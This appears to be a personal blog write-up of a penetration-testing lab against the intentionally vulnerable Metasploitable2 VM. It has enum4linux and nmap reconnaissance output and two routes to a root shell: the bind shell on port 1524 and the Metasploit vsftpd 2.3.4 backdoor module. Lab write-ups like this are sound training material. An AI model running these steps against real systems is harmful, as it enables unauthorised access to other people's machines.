Monday, January 28, 2019

Metasploitable2

netdiscover -r 123.123.123.0/24

123.123.123.102 00:0c:29:c3:07:99      1      60  VMware, Inc.             

root@KaliLNX:~# enum4linux 123.123.123.102
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Oct  1 18:37:40 2018

 ==========================
|    Target Information    |
 ==========================
Target ........... 123.123.123.102
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =======================================================
|    Enumerating Workgroup/Domain on 123.123.123.102    |
 =======================================================
[+] Got domain/workgroup name: WORKGROUP

 ===============================================
|    Nbtstat Information for 123.123.123.102    |
 ===============================================
Looking up status of 123.123.123.102
METASPLOITABLE  <00> -         B   Workstation Service
METASPLOITABLE  <03> -         B   Messenger Service
METASPLOITABLE  <20> -         B   File Server Service
WORKGROUP       <00> - B   Domain/Workgroup Name
WORKGROUP       <1e> - B   Browser Service Elections

MAC Address = 00-00-00-00-00-00

 ========================================
|    Session Check on 123.123.123.102    |
 ========================================
[+] Server 123.123.123.102 allows sessions using username '', password ''

 ==============================================
|    Getting domain SID for 123.123.123.102    |
 ==============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 =========================================
|    OS information on 123.123.123.102    |
 =========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 123.123.123.102 from smbclient:
[+] Got OS info for 123.123.123.102 from srvinfo:
METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian)
platform_id     : 500
os version      : 4.9
server type     : 0x9a03

 ================================
|    Users on 123.123.123.102    |
 ================================
index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games Name: games Desc: (null)
index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody Name: nobody Desc: (null)
index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind Name: (null) Desc: (null)
index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy Name: proxy Desc: (null)
index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog Name: (null) Desc: (null)
index: 0x6 RID: 0xbba acb: 0x00000010 Account: user Name: just a user,111,, Desc: (null)
index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data Name: www-data Desc: (null)
index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root Name: root Desc: (null)
index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news Name: news Desc: (null)
index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres Name: PostgreSQL administrator,,, Desc: (null)
index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin Name: bin Desc: (null)
index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail Name: mail Desc: (null)
index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd Name: (null) Desc: (null)
index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd Name: (null) Desc: (null)
index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp Name: (null) Desc: (null)
index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon Name: daemon Desc: (null)
index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd Name: (null) Desc: (null)
index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man Name: man Desc: (null)
index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp Name: lp Desc: (null)
index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql Name: MySQL Server,,, Desc: (null)
index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats Name: Gnats Bug-Reporting System (admin) Desc: (null)
index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid Name: (null) Desc: (null)
index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup Name: backup Desc: (null)
index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin Name: msfadmin,,, Desc: (null)
index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd Name: (null) Desc: (null)
index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys Name: sys Desc: (null)
index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog Name: (null) Desc: (null)
index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix Name: (null) Desc: (null)
index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service Name: ,,, Desc: (null)
index: 0x1e RID: 0x434 acb: 0x00000011 Account: list Name: Mailing List Manager Desc: (null)
index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc Name: ircd Desc: (null)
index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp Name: (null) Desc: (null)
index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55 Name: (null) Desc: (null)
index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync Name: sync Desc: (null)
index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp Name: uucp Desc: (null)

user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x402]
user:[syslog] rid:[0x4b4]
user:[user] rid:[0xbba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[postgres] rid:[0x4c0]
user:[bin] rid:[0x3ec]
user:[mail] rid:[0x3f8]
user:[distccd] rid:[0x4c6]
user:[proftpd] rid:[0x4ca]
user:[dhcp] rid:[0x4b2]
user:[daemon] rid:[0x3ea]
user:[sshd] rid:[0x4b8]
user:[man] rid:[0x3f4]
user:[lp] rid:[0x3f6]
user:[mysql] rid:[0x4c2]
user:[gnats] rid:[0x43a]
user:[libuuid] rid:[0x4b0]
user:[backup] rid:[0x42c]
user:[msfadmin] rid:[0xbb8]
user:[telnetd] rid:[0x4c8]
user:[sys] rid:[0x3ee]
user:[klog] rid:[0x4b6]
user:[postfix] rid:[0x4bc]
user:[service] rid:[0xbbc]
user:[list] rid:[0x434]
user:[irc] rid:[0x436]
user:[ftp] rid:[0x4be]
user:[tomcat55] rid:[0x4c4]
user:[sync] rid:[0x3f0]
user:[uucp] rid:[0x3fc]

 ============================================
|    Share Enumeration on 123.123.123.102    |
 ============================================
WARNING: The "syslog" option is deprecated

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
tmp             Disk      oh noes!
opt             Disk     
IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.

Server               Comment
---------            -------

Workgroup            Master
---------            -------
WORKGROUP           

[+] Attempting to map shares on 123.123.123.102
//123.123.123.102/print$ Mapping: DENIED, Listing: N/A
//123.123.123.102/tmp Mapping: OK, Listing: OK
//123.123.123.102/opt Mapping: DENIED, Listing: N/A
//123.123.123.102/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//123.123.123.102/ADMIN$ Mapping: DENIED, Listing: N/A

 =======================================================
|    Password Policy Information for 123.123.123.102    |
 =======================================================
[E] Unexpected error from polenum:
Traceback (most recent call last):
  File "/usr/bin/polenum", line 33, in
    from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 =================================
|    Groups on 123.123.123.102    |
 =================================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ==========================================================================
|    Users on 123.123.123.102 via RID cycling (RIDS: 500-550,1000-1050)    |
 ==========================================================================
[I] Found new SID: S-1-5-21-1042354039-2475377354-766472396
[+] Enumerating users using SID S-1-5-21-1042354039-2475377354-766472396 and logon username '', password ''
S-1-5-21-1042354039-2475377354-766472396-500 METASPLOITABLE\Administrator (Local User)
S-1-5-21-1042354039-2475377354-766472396-501 METASPLOITABLE\nobody (Local User)
S-1-5-21-1042354039-2475377354-766472396-502 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-503 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-504 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-505 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-506 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-507 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-508 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-509 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-510 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-511 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-512 METASPLOITABLE\Domain Admins (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-513 METASPLOITABLE\Domain Users (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-514 METASPLOITABLE\Domain Guests (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-515 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-516 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-517 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-518 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-519 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-520 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-521 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-522 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-523 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-524 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-525 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-526 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-527 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-528 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-529 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-530 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-531 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-532 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-533 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-534 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-535 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-536 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-537 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-538 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-539 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-540 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-541 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-542 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-543 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-544 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-545 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-546 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-547 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-548 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-549 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-550 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1000 METASPLOITABLE\root (Local User)
S-1-5-21-1042354039-2475377354-766472396-1001 METASPLOITABLE\root (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1002 METASPLOITABLE\daemon (Local User)
S-1-5-21-1042354039-2475377354-766472396-1003 METASPLOITABLE\daemon (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1004 METASPLOITABLE\bin (Local User)
S-1-5-21-1042354039-2475377354-766472396-1005 METASPLOITABLE\bin (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1006 METASPLOITABLE\sys (Local User)
S-1-5-21-1042354039-2475377354-766472396-1007 METASPLOITABLE\sys (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1008 METASPLOITABLE\sync (Local User)
S-1-5-21-1042354039-2475377354-766472396-1009 METASPLOITABLE\adm (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1010 METASPLOITABLE\games (Local User)
S-1-5-21-1042354039-2475377354-766472396-1011 METASPLOITABLE\tty (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1012 METASPLOITABLE\man (Local User)
S-1-5-21-1042354039-2475377354-766472396-1013 METASPLOITABLE\disk (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1014 METASPLOITABLE\lp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1015 METASPLOITABLE\lp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1016 METASPLOITABLE\mail (Local User)
S-1-5-21-1042354039-2475377354-766472396-1017 METASPLOITABLE\mail (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1018 METASPLOITABLE\news (Local User)
S-1-5-21-1042354039-2475377354-766472396-1019 METASPLOITABLE\news (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1020 METASPLOITABLE\uucp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1021 METASPLOITABLE\uucp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1022 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1023 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1024 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1025 METASPLOITABLE\man (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1026 METASPLOITABLE\proxy (Local User)
S-1-5-21-1042354039-2475377354-766472396-1027 METASPLOITABLE\proxy (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1028 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1029 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1030 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1031 METASPLOITABLE\kmem (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1032 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1033 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1034 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1035 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1036 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1037 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1038 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1039 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1040 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1041 METASPLOITABLE\dialout (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1042 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1043 METASPLOITABLE\fax (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1044 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1045 METASPLOITABLE\voice (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1046 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1047 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1048 *unknown*\*unknown* (8)
S-1-5-21-1042354039-2475377354-766472396-1049 METASPLOITABLE\cdrom (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1050 *unknown*\*unknown* (8)

 ================================================
|    Getting printer info for 123.123.123.102    |
 ================================================
No printers returned.


enum4linux complete on Mon Oct  1 18:38:06 2018



PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 123.123.123.201
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after:  2010-04-16T14:07:45
| MD5:   dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2018-10-01T11:41:17+00:00; -5s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      37107/tcp  mountd
|   100005  1,2,3      46647/udp  mountd
|   100021  1,3,4      37491/tcp  nlockmgr
|   100021  1,3,4      41496/udp  nlockmgr
|   100024  1          36546/udp  status
|_  100024  1          36856/tcp  status
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    Java RMI Registry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info:
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: SupportsTransactions, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, SupportsCompression, Support41Auth, ConnectWithDatabase, LongColumnFlag
|   Status: Autocommit
|_  Salt: loe.T=pB5"I,?78Of2g0
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after:  2010-04-16T14:07:45
| MD5:   dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2018-10-01T11:41:18+00:00; -5s from scanner time.
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    VNC Authentication (2)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:C3:07:99 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.003 days (since Mon Oct  1 18:36:30 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=208 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -5s, deviation: 0s, median: -5s
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC: (unknown)
| Names:
|   METASPLOITABLE<00>   Flags:
|   METASPLOITABLE<03>   Flags:
|   METASPLOITABLE<20>   Flags:
|   \x01\x02__MSBROWSE__\x02<01>  Flags:
|   WORKGROUP<00>        Flags:
|   WORKGROUP<1d>        Flags:
|_  WORKGROUP<1e>        Flags:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2018-10-01T07:41:16-04:00
|_smb2-time: Protocol negotiation failed (SMB2)




# Options 1

1524/tcp open  shell       Metasploitable root shell

telnet 123.123.123.102 1524

root@KaliLNX:~# telnet 123.123.123.102 1524
Trying 123.123.123.102...
Connected to 123.123.123.102.
Escape character is '^]'.
root@metasploitable:/#
root@metasploitable:/# root@metasploitable:/#
root@metasploitable:/# root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)


# Option 2
Let go with:   vsFTPd 2.3.4 - secure, fast, stable

oot@KaliLNX:~# searchsploit ftp |grep 2.3.4
Cat Soft Serv-U FTP Server 2.5.x - Brute Force                             | windows/remote/20334.java
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                     | unix/remote/17491.rb



msfconsole
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > set RHOST 123.123.123.102
RHOST => 123.123.123.102
msf exploit(vsftpd_234_backdoor) > exploit

[*] 123.123.123.102:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 123.123.123.102:21 - USER: 331 Please specify the password.
[+] 123.123.123.102:21 - Backdoor service has been spawned, handling...
[+] 123.123.123.102:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (123.123.123.201:41237 -> 123.123.123.102:6200) at 2018-10-01 18:59:58 +0700


id
uid=0(root) gid=0(root)
pwd
/


No comments:

Post a Comment